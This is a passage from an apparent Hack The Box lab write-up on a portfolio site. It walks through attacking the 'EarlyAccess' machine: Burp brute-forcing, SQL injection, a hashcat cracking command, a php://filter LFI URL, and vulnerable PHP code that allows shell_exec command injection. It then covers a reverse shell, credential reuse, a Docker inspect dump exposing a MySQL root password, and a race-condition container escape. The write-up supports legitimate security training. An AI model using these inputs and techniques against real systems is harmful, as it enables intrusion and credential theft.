                                          KEY01-0H0H0-XPNZ0-GAME1-1333
                                          KEY01-0H0H0-XPOZ0-GAME1-1334
                                          KEY01-0H0H0-XPPZ0-GAME1-1335
                                          KEY01-0H0H0-XPQZ0-GAME1-1336
                                          KEY01-0H0H0-XPRZ0-GAME1-1337
                                          KEY01-0H0H0-XPSZ0-GAME1-1338
                                          KEY01-0H0H0-XPTZ0-GAME1-1339
                                          KEY01-0H0H0-XPUZ0-GAME1-1340
                                          KEY01-0H0H0-XPVZ0-GAME1-1341
                                          KEY01-0H0H0-XPWZ0-GAME1-1342
                                          KEY01-0H0H0-XPXZ0-GAME1-1343
                                          KEY01-0H0H0-XPYZ0-GAME1-1344
                                          KEY01-0H0H0-XPZZ0-GAME1-1345
                                          KEY01-0H0H0-XPZZ1-GAME1-1346
                                          KEY01-0H0H0-XPZZ2-GAME1-1347
                                          KEY01-0H0H0-XPZZ3-GAME1-1348
                                          KEY01-0H0H0-XPZZ4-GAME1-1349
                                          KEY01-0H0H0-XPZZ5-GAME1-1350
                                          KEY01-0H0H0-XPZZ6-GAME1-1351
                                          KEY01-0H0H0-XPZZ7-GAME1-1352
                                          KEY01-0H0H0-XPZZ8-GAME1-1353
                                          KEY01-0H0H0-XPZZ9-GAME1-1354
                                      </code>
                                      </pre>
          <p>First we need to intercept to post so we can copy it.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png" alt=""></a>
          <p>Now we can send it to the intruder to start brute-forcing this magic number.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png" alt=""></a>
          <p>I've added the payload which is the list of possible combinations we've just compiled.
          Now we need to add it into the POST.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png" alt=""></a>
          <p>Now let's start attacking!</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png" alt=""></a>
          <p>That didn't go as planned it looks like all the requests got redirected let's look at the
          settings if we can change anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png" alt=""></a>
          <p>Looks like Burpsuite just needed to be allowed to follow redirects. This is probably also
          the reason why our first GoBuster attempt failed.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png" alt=""></a>
          <p>Now to second attack is way more promising. One key stands out because the response
          length is different from the rest. Let's try that key and see what happens.</p>
          <a href="img/portfolio/minor/red/htb_linux/KeyValidationTest.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/KeyValidationTest.png" alt=""></a>
          <p>And it worked! Now lets go back to our normal user account and add this key to our
          account.</p>
          <a href="img/portfolio/minor/red/htb_linux/AddKeyToUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AddKeyToUser.png" alt=""></a>
          <p>Now we got the key added to our account we can take a look at that game subdomain we
          found earlier.</p>
          <a href="img/portfolio/minor/red/htb_linux/Scoreboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Scoreboard.png" alt=""></a>
          <p>Something I noticed instantly is the scoreboard that the SingleQuoteMan talked about on
          the forum. Maybe we can do the same trick with SQLI as we did with XSS at the beginning.
          We can do a simple SQLI test to find out if it's vulnerable.</p>
          <a href="img/portfolio/minor/red/htb_linux/VulnForSQLI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/VulnForSQLI.png" alt=""></a>
          <p>It is vulnerable but we didn't match the columns hence why it didn't show any output so
          lets try that again.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLVersion.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLVersion.png" alt=""></a>
          <p>Now look at that this should be easy. Lets try to enumerate the database tables.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIDBDump.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIDBDump.png" alt=""></a>
          <p>A user table? Very interesting lets see if it contains any passwords or usernames.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIUsers.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIUsers.png" alt=""></a>
           <p>And it does! Looks like we got an admin username and a password hash we need to crack.
          But first lets find out what type of hash it is.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashIdentifier.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashIdentifier.png" alt=""></a>
          <p>Looks like it's a SHA1 hash lets see if Hashcat can find the password for us.</p>
          <code>hashcat -a 0 -m 100 adminhash.txt /usr/share/wordlists/rockyou.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/Hashcat.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Hashcat.png" alt=""></a>
          <p>Yes it can! Now lets try to use these credentials to log into the dev subdomain.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png" alt=""></a>
          <p>Lets try to run Dirbuster one more time to see if it finds anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/Dirbuster.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Dirbuster.png" alt=""></a>
          <p>Almost forgot we have to add the PHPSESSID from this admin to Dirbuster otherwise it
          won't have access to enumerate the site.</p>
          <a href="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png" alt=""></a>
          <p>Dirtbuster found a file called /actions/file.php which could be interesting. By the looks
          of it this is the file that is running on the homepage of this subdomain as well but
          there it said it didn't have a GUI yet. Maybe we can use it without GUI now we know the
          location of the file. But we need to know the command because now it gives us an
          error.</p>
          <a href="img/portfolio/minor/red/htb_linux/SpecifyFile.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SpecifyFile.png" alt=""></a>
          <p>Lets try some common command in this context like file, path and filepath. Hey! Filepath
          worked and now we can execute files and apparently also the hashingTool that is also on
          the homepage.</p>
          <a href="img/portfolio/minor/red/htb_linux/FileExecuted.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FileExecuted.png" alt=""></a>
          <p>Lets take a look at LFI (Local File Inclusion) and see if we can do something with that.
          I've found this <a href="https://medium.com/@nyomanpradipta120/local-file-inclusion-vulnerability-cfd9e62d12cb">website</a>
          that explains a LFI vulnerability we could try</p>
          <code>https://dev.earlyaccess.htb/actions/file.php?filepath=php://filter/convert.base64-encode/resource=/var/www/earlyaccess.htb/dev/actions/hash.php</code>
          <a href="img/portfolio/minor/red/htb_linux/HashBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashBase64.png" alt=""></a>
          <p>This gave us the base64 of the hash.php file if we can convert it back to code we might
          be able to find a vulnerability.</p>
          <a href="img/portfolio/minor/red/htb_linux/DecodedBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DecodedBase64.png" alt=""></a>
          <p>Using an online base64 decoder we managed to find the source code of the hash.php
          file.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              &#x3C;?php
                                              include_once "../includes/session.php";
          
                                              function hash_pw($hash_function, $password)
                                              {
                                                  // DEVELOPER-NOTE: There has gotta be an easier way...
                                                  ob_start();
                                                  // Use inputted hash_function to hash password
                                                  $hash = @$hash_function($password);
                                                  ob_end_clean();
                                                  return $hash;
                                              }
          
                                              try
                                              {
                                                  if(isset($_REQUEST['action']))
                                                  {
                                                      if($_REQUEST['action'] === "verify")
                                                      {
                                                          // VERIFIES $password AGAINST $hash
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['hash']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
          
                                                              $_SESSION['verify'] = ($hash === $_REQUEST['hash']);
                                                              header('Location: /home.php?tool=hashing');
                                                              return;
                                                          }
                                                      }
                                                      elseif($_REQUEST['action'] === "verify_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE VERIFICATION
                                                      }
                                                      elseif($_REQUEST['action'] === "hash_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE-HASHING
                                                      }
                                                      elseif($_REQUEST['action'] === "hash")
                                                      {
                                                          // HASHES $password USING $hash_function
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
                                                              if(!isset($_REQUEST['redirect']))
                                                              {
                                                                  echo "Result for Hash-function (" . $_REQUEST['hash_function'] . ") and password (" . $_REQUEST['password'] . "):&#x3C;br>";
                                                                  echo '&#x3C;br>' . $hash;
                                                                  return;
                                                              }
                                                              else
                                                              {
                                                                  $_SESSION['hash'] = $hash;
                                                                  header('Location: /home.php?tool=hashing');
                                                                  return;
                                                              }
                                                          }
                                                      }
                                                  }
                                                  // Action not set, ignore
                                                  throw new Exception("");
                                              }
                                              catch(Exception $ex)
                                              {
                                                  if($ex->getMessage() !== "")
                                                      $_SESSION['error'] = htmlentities($ex->getMessage());
          
                                                  header('Location: /home.php');
                                                  return;
                                              }
                                              ?>
                                          </code>
                                      </pre>
          <p>After analyzing the source code it looks like if you send the debug parameter as true and
          the hashing_function as shell_exec, you
          can run any shell command you want from the hashing tool. So lets try that.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png" alt=""></a>
          <p>Looks like it worked now lets try to get a reverse shell.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WWW-DataShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-DataShell.png" alt=""></a>
          <p>And we're in! I looked in the /etc/passwd and noticed another user named www-adm which
          looked like the next user I needed. After looking around for a bit and I couldn't find
          anything I thought what if they reused passwords?</p>
          <a href="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png" alt=""></a>
          <p>And they did so now we have www-adm shell. After looking around I noticed a .wgetrc file
          with some credentials in it. Because it looked like docker was running on the machine I
          thought http://api:5000/ was my best bet.</p>
          <a href="img/portfolio/minor/red/htb_linux/WGETAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETAPI.png" alt=""></a>
          <p>And it was! Apparently there is a check_db endpoint but it required credentials. So I
          tried to credentials we've just found.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatCheckDB.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatCheckDB.png" alt=""></a>
          <p>Looks like JSON but we first need to prettify it to make it more readable.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              {
             "message":{
                "AppArmorProfile":"docker-default",
                "Args":[
                   "--character-set-server=utf8mb4",
                   "--collation-server=utf8mb4_bin",
                   "--skip-character-set-client-handshake",
                   "--max_allowed_packet=50MB",
                   "--general_log=0",
                   "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                ],
                "Config":{
                   "AttachStderr":false,
                   "AttachStdin":false,
                   "AttachStdout":false,
                   "Cmd":[
                      "--character-set-server=utf8mb4",
                      "--collation-server=utf8mb4_bin",
                      "--skip-character-set-client-handshake",
                      "--max_allowed_packet=50MB",
                      "--general_log=0",
                      "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                   ],
                   "Domainname":"",
                   "Entrypoint":[
                      "docker-entrypoint.sh"
                   ],
                   "Env":[
                      "MYSQL_DATABASE=db",
                      "MYSQL_USER=drew",
                      "MYSQL_PASSWORD=drew",
                      "MYSQL_ROOT_PASSWORD=XeoNu86JTznxMCQuGHrGutF3Csq5",
                      "SERVICE_TAGS=dev",
                      "SERVICE_NAME=mysql",
                      "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
                      "GOSU_VERSION=1.12",
                      "MYSQL_MAJOR=8.0",
                      "MYSQL_VERSION=8.0.25-1debian10"
                   ],
                   "ExposedPorts":{
                      "3306/tcp":{
          
                      },
                      "33060/tcp":{
          
                      }
                   },
                   "Healthcheck":{
                      "Interval":5000000000,
                      "Retries":3,
                      "Test":[
                         "CMD-SHELL",
                         "mysqladmin ping -h 127.0.0.1 --user=$MYSQL_USER -p$MYSQL_PASSWORD --silent"
                      ],
                      "Timeout":2000000000
                   },
                   "Hostname":"mysql",
                   "Image":"mysql:latest",
                   "Labels":{
                      "com.docker.compose.config-hash":"947cb358bc0bb20b87239b0dffe00fd463bd7e10355f6aac2ef1044d8a29e839",
                      "com.docker.compose.container-number":"1",
                      "com.docker.compose.oneoff":"False",
                      "com.docker.compose.project":"app",
                      "com.docker.compose.project.config_files":"docker-compose.yml",
                      "com.docker.compose.project.working_dir":"/root/app",
                      "com.docker.compose.service":"mysql",
                      "com.docker.compose.version":"1.29.1"
                   },
                   "OnBuild":null,
                   "OpenStdin":false,
                   "StdinOnce":false,
                   "Tty":true,
                   "User":"",
                   "Volumes":{
                      "/docker-entrypoint-initdb.d":{
          
                      },
                      "/var/lib/mysql":{
          
                      }
                   },
                   "WorkingDir":""
                },
                "Created":"2021-10-04T06:57:43.698655618Z",
                "Driver":"overlay2",
                "ExecIDs":null,
                "GraphDriver":{
                   "Data":{
                      "LowerDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d-init/diff:/var/lib/docker/overlay2/ecc064365b0367fc58ac796d9d5fe020d9453c68e2563f8f6d4682e38231083e/diff:/var/lib/docker/overlay2/4a21c5c296d0e6d06a3e44e3fa4817ab6f6f8c3612da6ba902dc28ffd749ec4d/diff:/var/lib/docker/overlay2/f0cdcc7bddc58609f75a98300c16282d8151ce18bd89c36be218c52468b3a643/diff:/var/lib/docker/overlay2/01e8af3c602aa396e4cb5af2ed211a6a3145337fa19b123f23e36b006d565fd0/diff:/var/lib/docker/overlay2/55b88ae64530676260fe91d4d3e6b0d763165505d3135a3495677cb10de74a66/diff:/var/lib/docker/overlay2/4064491ac251bcc0b677b0f76de7d5ecf0c17c7d64d7a18debe8b5a99e73e127/diff:/var/lib/docker/overlay2/a60c199d618b0f2001f106393236ba394d683a96003a4e35f58f8a7642dbad4f/diff:/var/lib/docker/overlay2/29b638dc55a69c49df41c3f2ec0f90cc584fac031378ae455ed1458a488ec48d/diff:/var/lib/docker/overlay2/ee59a9d7b93adc69453965d291e66c7d2b3e6402b2aef6e77d367da181b8912f/diff:/var/lib/docker/overlay2/4b5204c09ec7b0cbf22d409408529d79a6d6a472b3c4d40261aa8990ff7a2ea8/diff:/var/lib/docker/overlay2/8178a3527c2a805b3c2fe70e179797282bb426f3e73e8f4134bc2fa2f2c7aa22/diff:/var/lib/docker/overlay2/76b10989e43e43406fc4306e789802258e36323f7c2414e5e1242b6eab4bd3eb/diff",
                      "MergedDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/merged",
                      "UpperDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/diff",
                      "WorkDir":"/var/lib/docker/overlay2/15b0f0978cf938d269ad6db1a05238d1d2a86a9fc161a0c6fa9ca16a8974c55d/work"
                   },
                   "Name":"overlay2"
                },
                "HostConfig":{
                   "AutoRemove":false,
                   "Binds":[
                      "/root/app/scripts/init.d:/docker-entrypoint-initdb.d:ro",
                      "app_vol_mysql:/var/lib/mysql:rw"
                   ],
                   "BlkioDeviceReadBps":null,
                   "BlkioDeviceReadIOps":null,
                   "BlkioDeviceWriteBps":null,
                   "BlkioDeviceWriteIOps":null,
                   "BlkioWeight":0,
                   "BlkioWeightDevice":null,
                   "CapAdd":[
                      "SYS_NICE"
                   ],
                   "CapDrop":null,
                   "Cgroup":"",
                   "CgroupParent":"",
                   "CgroupnsMode":"host",
                   "ConsoleSize":[
                      0,
                      0
                   ],
                   "ContainerIDFile":"",
                   "CpuCount":0,
                   "CpuPercent":0,
                   "CpuPeriod":0,
                   "CpuQuota":0,
                   "CpuRealtimePeriod":0,
                   "CpuRealtimeRuntime":0,
                   "CpuShares":0,
                   "CpusetCpus":"",
                   "CpusetMems":"",
                   "DeviceCgroupRules":null,
                   "DeviceRequests":null,
                   "Devices":null,
                   "Dns":null,
                   "DnsOptions":null,
                   "DnsSearch":null,
                   "ExtraHosts":null,
                   "GroupAdd":null,
                   "IOMaximumBandwidth":0,
                   "IOMaximumIOps":0,
                   "IpcMode":"private",
                   "Isolation":"",
                   "KernelMemory":0,
                   "KernelMemoryTCP":0,
                   "Links":null,
                   "LogConfig":{
                      "Config":{
          
                      },
                      "Type":"json-file"
                   },
                   "MaskedPaths":[
                      "/proc/asound",
                      "/proc/acpi",
                      "/proc/kcore",
                      "/proc/keys",
                      "/proc/latency_stats",
                      "/proc/timer_list",
                      "/proc/timer_stats",
                      "/proc/sched_debug",
                      "/proc/scsi",
                      "/sys/firmware"
                   ],
                   "Memory":0,
                   "MemoryReservation":0,
                   "MemorySwap":0,
                   "MemorySwappiness":null,
                   "NanoCpus":0,
                   "NetworkMode":"app_nw",
                   "OomKillDisable":false,
                   "OomScoreAdj":0,
                   "PidMode":"",
                   "PidsLimit":null,
                   "PortBindings":{
          
                   },
                   "Privileged":false,
                   "PublishAllPorts":false,
                   "ReadonlyPaths":[
                      "/proc/bus",
                      "/proc/fs",
                      "/proc/irq",
                      "/proc/sys",
                      "/proc/sysrq-trigger"
                   ],
                   "ReadonlyRootfs":false,
                   "RestartPolicy":{
                      "MaximumRetryCount":0,
                      "Name":"always"
                   },
                   "Runtime":"runc",
                   "SecurityOpt":null,
                   "ShmSize":67108864,
                   "UTSMode":"",
                   "Ulimits":null,
                   "UsernsMode":"",
                   "VolumeDriver":"",
                   "VolumesFrom":[
          
                   ]
                },
                "HostnamePath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hostname",
                "HostsPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/hosts",
                "Id":"47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216",
                "Image":"sha256:5c62e459e087e3bd3d963092b58e50ae2af881076b43c29e38e2b5db253e0287",
                "LogPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216-json.log",
                "MountLabel":"",
                "Mounts":[
                   {
                      "Destination":"/docker-entrypoint-initdb.d",
                      "Mode":"ro",
                      "Propagation":"rprivate",
                      "RW":false,
                      "Source":"/root/app/scripts/init.d",
                      "Type":"bind"
                   },
                   {
                      "Destination":"/var/lib/mysql",
                      "Driver":"local",
                      "Mode":"rw",
                      "Name":"app_vol_mysql",
                      "Propagation":"",
                      "RW":true,
                      "Source":"/var/lib/docker/volumes/app_vol_mysql/_data",
                      "Type":"volume"
                   }
                ],
                "Name":"/mysql",
                "NetworkSettings":{
                   "Bridge":"",
                   "EndpointID":"",
                   "Gateway":"",
                   "GlobalIPv6Address":"",
                   "GlobalIPv6PrefixLen":0,
                   "HairpinMode":false,
                   "IPAddress":"",
                   "IPPrefixLen":0,
                   "IPv6Gateway":"",
                   "LinkLocalIPv6Address":"",
                   "LinkLocalIPv6PrefixLen":0,
                   "MacAddress":"",
                   "Networks":{
                      "app_nw":{
                         "Aliases":[
                            "47c78eb0450f",
                            "mysql"
                         ],
                         "DriverOpts":null,
                         "EndpointID":"50037fb137fd880f88a9efd17eb8cf94bf8142ec263080b4c904afeeaa79aa2e",
                         "Gateway":"172.18.0.1",
                         "GlobalIPv6Address":"",
                         "GlobalIPv6PrefixLen":0,
                         "IPAMConfig":{
                            "IPv4Address":"172.18.0.100"
                         },
                         "IPAddress":"172.18.0.100",
                         "IPPrefixLen":16,
                         "IPv6Gateway":"",
                         "Links":null,
                         "MacAddress":"02:42:ac:12:00:64",
                         "NetworkID":"021b24b8b3e1e3638463eeb7dc9af59c36cc412578cdf51931a24f04ea6f5532"
                      }
                   },
                   "Ports":{
                      "3306/tcp":null,
                      "33060/tcp":null
                   },
                   "SandboxID":"99cbb57fded2142e5dad46330b43249d2866f8514fb4342d06322f3e3b5c60f1",
                   "SandboxKey":"/var/run/docker/netns/99cbb57fded2",
                   "SecondaryIPAddresses":null,
                   "SecondaryIPv6Addresses":null
                },
                "Path":"docker-entrypoint.sh",
                "Platform":"linux",
                "ProcessLabel":"",
                "ResolvConfPath":"/var/lib/docker/containers/47c78eb0450f08b91f8e1c587c98f4e2b4e5ac4b4c26c6a0a3283bc67d5df216/resolv.conf",
                "RestartCount":0,
                "State":{
                   "Dead":false,
                   "Error":"",
                   "ExitCode":0,
                   "FinishedAt":"0001-01-01T00:00:00Z",
                   "Health":{
                      "FailingStreak":0,
                      "Log":[
                         {
                            "End":"2021-10-04T17:08:01.998027574+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:01.908189033+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:07.080804898+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:07.000613396+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:12.166584919+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:12.083845791+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:17.254375293+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:17.16894306+02:00"
                         },
                         {
                            "End":"2021-10-04T17:08:22.350400823+02:00",
                            "ExitCode":0,
                            "Output":"mysqladmin: [Warning] Using a password on the command line interface can be insecure.\nmysqld is alive\n",
                            "Start":"2021-10-04T17:08:22.257747436+02:00"
                         }
                      ],
                      "Status":"healthy"
                   },
                   "OOMKilled":false,
                   "Paused":false,
                   "Pid":1108,
                   "Restarting":false,
                   "Running":true,
                   "StartedAt":"2021-10-04T06:57:47.409835076Z",
                   "Status":"running"
                }
             },
             "status":200
          }
                                          </code>
                                      </pre>
          <p>Looks like an username and some passwords lets try those with ssh.</p>
          <a href="img/portfolio/minor/red/htb_linux/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/UserFlag.png" alt=""></a>
          <p>We got the user flag! But now we need to find something to escalate our privileges. We
          could use LinPEAS to try and find something but we first have to get it on this
          machine.</p>
          <a href="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WGETLinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETLinpeas.png" alt=""></a>
          <p>I used SimpleHTTPServer to get LinPeas from my machine to the target machine because the
          target machine didn't have access to the internet. Now we need to run LinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasMail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasMail.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerIP.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LinpeasDockerFolder.png" alt=""></a>
          <p>Looks like LinPEAS found some interesting stuff like a mail message to Drew and the
          docker ip ranges and a docker folder that is edited regularly.</p>
          <a href="img/portfolio/minor/red/htb_linux/Mail.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Mail.png" alt=""></a>
          <p>This probably means that the docker folder that gets edited regularly is the folder
          containing the game. And that some script is running that we could use.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>Looks like we got a public key as game-tester as well. Lets try to login into the docker
          ips using this public key.</p>
          <a href="img/portfolio/minor/red/htb_linux/Game-testerShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Game-testerShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderGame-tester.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SharedFolderDrew.png" alt=""></a>
          <p>And it worked now we got a shell as game-tester as well on a docker container. I noticed
          that the same docker folder on Drew also exists on the docker container and that they
          are shared. I also noticed that the docker folder get rewritten entirely so all files
          inside get removed and replaced before the server is restarted again. Lets see what the
          script does.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatNode-server.png" alt=""></a>
          <p>It runs in a folder called /usr/src/app which doesn't exist on the Drew user but it does
          on the game-tester container. So lets look at that as well.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatServerJS.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatServerJS.png" alt=""></a>
          <p>Look like we can crash the server if we make a POST to autoplay with a decimal instead of
          an integer. But that doesn't get us anywhere we need to infect the node-server.sh
          first.</p>
          <a href="img/portfolio/minor/red/htb_linux/DrewPublicKey.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DrewPublicKey.png" alt=""></a>
          <p>I found this <a href="https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout">website</a>
          explaining priv esc with docker so I gave it a try. But I have to be faster than the
          server can create the node-server.sh in order to infect it. So I created a script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RogueNode-server.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RogueNode-server.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/ExploitLoop.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitLoop.png" alt=""></a>
          <p>This should create a bash file in /tmp on the game-tester container that is executable by
          game-tester in order to priv esc. So lets crash the server and try it.</p>
          <a href="img/portfolio/minor/red/htb_linux/ExploitRun.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ExploitRun.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/CrashGameServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CrashGameServer.png" alt=""></a>
          <p>I had to give it a few tries in order to succeed because in some cases the server was
          actually faster than my script.</p>
          <a href="img/portfolio/minor/red/htb_linux/RootOnDocker.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/RootOnDocker.png" alt=""></a>
          <p>And it worked now we need to do the same thing in order to get root on the Drew machine
          but this time we don't have to worry about speed because we don't need to infect a
